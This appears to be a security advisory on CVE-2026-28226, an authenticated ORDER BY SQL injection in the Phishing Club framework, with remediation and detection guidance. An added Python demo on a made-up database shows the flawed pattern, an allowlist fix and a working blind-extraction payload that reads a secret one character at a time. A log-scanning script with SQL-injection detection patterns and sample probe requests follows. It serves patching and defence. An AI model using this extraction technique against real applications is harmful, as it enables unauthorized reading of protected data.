
CVE-2026-28226: Medium Vulnerability in Phishing Club

A medium-severity SQL injection vulnerability exists in Phishing Club prior to version 1.30.2. This vulnerability can be exploited by authenticated attackers to manipulate SQL queries, leading to potential data exposure. Organizations should prioritize remediation efforts to mitigate risks.

Severity: Medium · CVSS 6.5 · Published February 26, 2026


This is an authenticated SQL injection in Phishing Club, a phishing simulation and man-in-the-middle framework. Prior to version 1.30.2, the 'GetOrphaned' recipient listing endpoint builds a raw SQL query by concatenating the user-controlled 'sortBy' value directly into the ORDER BY clause, without checking it against an allowlist of sortable columns. Any authenticated user can therefore place arbitrary SQL expressions into ORDER BY. Because ORDER BY accepts expressions rather than only column names, this class of injection does not need stacked queries to be harmful: a conditional expression built on a subquery changes the returned row order depending on data the endpoint never displays, which is enough to read that data out one comparison at a time.

The CVSS base score is 6.5 (medium). The attack is network-reachable, low in complexity and needs only low privileges (an ordinary authenticated account) with no user interaction, so the practical risk to an organization is unauthorized read access to the contents of the application database. All versions prior to v1.30.2 are affected.

As of the latest reports there is no known exploit in the wild and no public proof of concept. ORDER BY injection is nevertheless a well-understood class of bug that needs no special tooling once the vulnerable parameter is known, so organizations should not wait for exploitation to be reported before patching.

Phishing Club fixed the issue in version 1.30.2 by validating the order-by column against an allowlist. Installations that have not yet updated should do so promptly rather than waiting for a routine patch cycle: the affected endpoint is reachable by any authenticated user, and the database holds the recipient and campaign data the framework exists to manage.

Beyond this specific fix, organizations should regularly review their application security posture and validate their defenses against injection vulnerabilities of this kind.

Vulnerability Details

The vulnerability is classified as SQL injection (CWE-89) in the Phishing Club application. Specifically, a user-supplied value is placed into the ORDER BY clause of a raw query without validation, so an authenticated user can inject arbitrary SQL expressions into that query.

The CVSS base score is 6.5 (medium). The attack vector is network and the attack complexity is low, so an attacker who holds any authenticated account can exploit the flaw with relative ease.

This vulnerability was published on February 26, 2026, and impacts versions prior to 1.30.2. As of now, there are no known public exploits, but organizations should remain vigilant.

Technical Analysis

The root cause is missing input validation during SQL query construction: the 'GetOrphaned' endpoint does not check the 'sortBy' parameter against an allowlist of permitted column names before concatenating it into the ORDER BY clause, so attackers can inject arbitrary SQL expressions. The correct pattern is to map the incoming value onto a fixed set of known columns (and a fixed ASC/DESC direction) and reject anything else. Note that parameterized queries alone do not close this hole: database drivers bind values, not identifiers, so a column name in ORDER BY can never be a bound parameter and must be validated by the application.

The attack vector is network-based, and the attack complexity is low. Privileges required are low, meaning that an authenticated user can initiate this attack without needing administrative rights. User interaction is not required, increasing the risk profile of this vulnerability.

Successful exploitation primarily affects confidentiality, through unauthorized exposure of data held in the database. The integrity and availability impacts are rated as none; together with the network vector, low complexity, low privileges and no user interaction, this is consistent with the 6.5 base score.

Risk & Impact Analysis

Real-world deployment risk is substantial for any instance that is exposed to more than a handful of trusted users. Any authenticated user of an unpatched Phishing Club installation can attempt the injection, and because the framework's database holds recipient records and other campaign data, a successful attack exposes exactly the information a phishing-simulation platform is trusted to protect. The same injection point is reachable by an outside attacker who obtains any valid credential, including a low-privileged one.

Given the medium severity and the ease of exploitation, organizations should address this vulnerability in their priority patch cycle to minimize potential impacts.

Exploitation Status

Known Exploit: No
Public PoC: No
Actively Exploited: No
Ransomware Use: No

Affected Versions

The affected product is Phishing Club, specifically all versions prior to 1.30.2. Organizations should ensure they upgrade to the latest version to avoid this vulnerability.

Mitigation & Remediation

To remediate, upgrade Phishing Club to version 1.30.2 or later. Where the upgrade cannot be applied immediately, reduce exposure in the meantime: limit who holds accounts on the instance, since any authenticated user can reach the endpoint, and, if the deployment sits behind a reverse proxy or WAF, reject requests to the orphaned-recipient listing whose 'sortBy' value is anything other than a plain column name (letters, digits and underscores only). These are stopgaps; the real fix is the vendor's allowlist check in 1.30.2. Regular security audits and penetration testing remain useful for finding the same pattern elsewhere.
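The following is an added example and not Phishing Club's code: it reproduces the flawed pattern described in the technical analysis (a caller-supplied sort key concatenated into ORDER BY) beside the allowlist fix recommended above, on a constructed SQLite schema with invented table names (recipients, api_keys) and values. It also shows why an ORDER BY injection is a confidentiality issue even though it cannot run a second statement: a CASE expression on a subquery flips the row order depending on a condition, which lets an authenticated user read a value from an unrelated table one character at a time.

```python
import sqlite3

# Constructed sample schema for illustration; these are not Phishing Club's tables.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE recipients (id INTEGER PRIMARY KEY, email TEXT, created_at TEXT);
        CREATE TABLE api_keys (id INTEGER PRIMARY KEY, secret TEXT);
        INSERT INTO recipients VALUES (1, 'alice@example.com', '2026-01-01'),
                                      (2, 'bob@example.com',   '2026-01-02'),
                                      (3, 'carol@example.com', '2026-01-03');
        INSERT INTO api_keys VALUES (1, 's3cr3t');
    """)
    return conn

def list_orphaned_vulnerable(conn, sort_by):
    """The flawed pattern: the caller's sortBy string lands verbatim in ORDER BY.
    Returns the recipient ids in the order the database produced them."""
    sql = "SELECT id, email FROM recipients ORDER BY " + sort_by
    return [row[0] for row in conn.execute(sql)]

# Allowlist: request value -> real column name. Only these strings ever reach the SQL text.
ALLOWED_SORT = {"id": "id", "email": "email", "created_at": "created_at"}

def list_orphaned_fixed(conn, sort_by, direction="ASC"):
    """Hardened version: identifiers cannot be bound as query parameters, so the value is
    looked up in a fixed table and anything else is rejected before any SQL is built."""
    column = ALLOWED_SORT.get(sort_by)
    if column is None:
        raise ValueError(f"unsupported sortBy value: {sort_by!r}")
    direction = direction.upper()
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = f"SELECT id, email FROM recipients ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]

def oracle_guess_char(conn, position, ch):
    """One probe of a conditional-ordering oracle against the vulnerable listing.
    If the guessed character is right the ids come back 1,2,3; otherwise 3,2,1.
    The injected expression runs no extra statement, it only changes the sort key."""
    payload = (
        f"(CASE WHEN substr((SELECT secret FROM api_keys WHERE id = 1), {position}, 1) = '{ch}' "
        f"THEN id ELSE -id END)"
    )
    return list_orphaned_vulnerable(conn, payload) == [1, 2, 3]

def extract_secret(conn, max_len=32, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover api_keys.secret one character at a time through the ordering oracle."""
    recovered = ""
    for position in range(1, max_len + 1):
        for ch in alphabet:
            if oracle_guess_char(conn, position, ch):
                recovered += ch
                break
        else:
            break  # no character matched: we have run past the end of the value
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("benign sort:", list_orphaned_vulnerable(db, "id DESC"))
    print("secret read through ORDER BY oracle:", extract_secret(db))
    try:
        list_orphaned_fixed(db, "(CASE WHEN 1=1 THEN id ELSE -id END)")
    except ValueError as err:
        print("fixed listing rejected it:", err)
    print("fixed listing, email DESC:", list_orphaned_fixed(db, "email", "DESC"))
```

Run it directly to see the benign sort, the recovered secret and the rejection. The fixed version never interpolates the request value itself: it interpolates only strings taken from its own dictionary, which is the only safe way to handle identifiers, since drivers accept column names neither as bound parameters nor through escaping.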


Detection Guidance

Log requests to the 'GetOrphaned' recipient listing endpoint together with the raw 'sortBy' value and the authenticated user, and alert on values that are not among the endpoint's legitimate sort columns, in particular anything containing quotes, parentheses, commas, whitespace or SQL keywords such as CASE or SELECT. Database error logs for that endpoint and unusual latency on it are also worth watching: ORDER BY injection is typically probed with conditional or deliberately slow expressions, which show up as bursts of requests from one account with varying 'sortBy' values and changing response times or status codes.
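As an added example (not code from the advisory or from the project), the following script applies the guidance above to a handful of constructed access-log lines. The route /api/recipients/orphaned and the log format are assumptions, as is the set of legitimate sort columns; all three should be replaced with the values of the real deployment.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed route and log format (the advisory names the 'GetOrphaned' endpoint, not its URL).
ORPHANED_PATH = re.compile(r"/orphaned(?:/|$)", re.IGNORECASE)
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<user>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Legitimate sort keys for the endpoint; the real set comes from the application's allowlist.
ALLOWED_SORT = {"id", "email", "created_at"}

# Things a bare column name never contains: quotes, brackets, separators, comments, SQL keywords.
SUSPICIOUS = re.compile(
    r"""['"();,\s]|--|/\*|\b(?:case|select|union|sleep|randomblob|pg_sleep|benchmark)\b""",
    re.IGNORECASE,
)

def check_sort_by(value):
    """Return None for an acceptable sortBy value, otherwise a short reason for flagging it."""
    if value in ALLOWED_SORT:
        return None
    if SUSPICIOUS.search(value):
        return "sortBy contains SQL syntax"
    return "sortBy not in allowlist"

def scan_logs(lines):
    """Flag requests to the orphaned-recipient listing whose sortBy is not a known column.
    parse_qs decodes percent-encoding, so encoded payloads are inspected in clear."""
    findings = []
    for number, line in enumerate(lines, start=1):
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not ORPHANED_PATH.search(url.path):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("sortBy", []):
            reason = check_sort_by(value)
            if reason:
                findings.append({
                    "line": number, "user": m["user"], "status": int(m["status"]),
                    "sortBy": value, "reason": reason,
                })
    return findings

# Constructed sample log lines (not real traffic): two benign, one on another endpoint,
# one conditional-expression probe, one deliberately heavy expression, one unknown column.
SAMPLE_LOG = """\
2026-02-27T09:00:01Z alice "GET /api/recipients/orphaned?sortBy=email&page=1 HTTP/1.1" 200
2026-02-27T09:00:05Z bob "GET /api/campaigns?sortBy=name HTTP/1.1" 200
2026-02-27T09:01:10Z mallory "GET /api/recipients/orphaned?sortBy=(CASE%20WHEN%20(SELECT%201)%3D1%20THEN%20id%20ELSE%20email%20END) HTTP/1.1" 200
2026-02-27T09:01:12Z mallory "GET /api/recipients/orphaned?sortBy=id,(SELECT%20randomblob(100000000)) HTTP/1.1" 500
2026-02-27T09:02:00Z carol "GET /api/recipients/orphaned?sortBy=created_at HTTP/1.1" 200
2026-02-27T09:02:30Z dave "GET /api/recipients/orphaned?sortBy=phone HTTP/1.1" 200
""".splitlines()

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOG):
        print(f"line {f['line']}: user={f['user']} status={f['status']} "
              f"reason={f['reason']} sortBy={f['sortBy']!r}")
```

The two checks are deliberately separate: a value that fails the allowlist but looks like a plain identifier is usually a client bug or a new feature, while a value containing SQL syntax is an injection attempt and deserves a higher-priority alert. Correlating the user and status fields across lines (the same account sending several non-allowlisted values, or 5xx responses on this endpoint only) is what turns single hits into a credible signal.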

AppSecure Threat Intelligence Insight

The long-term significance of this vulnerability lies in how common its pattern is. Sort and filter parameters are frequently pasted into ORDER BY precisely because they cannot be bound as query parameters, and they are easy to miss in reviews that concentrate on WHERE clauses. Security teams should treat every dynamic identifier in a query (column name, table name, sort direction) as something that needs an allowlist, and should look for this pattern both in their own code and in the third-party tools they operate.

Organizations must develop robust input validation frameworks and conduct regular security training for developers to prevent such vulnerabilities, and should fold findings like this one into their vulnerability management process so that the fix is tracked to completion.

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
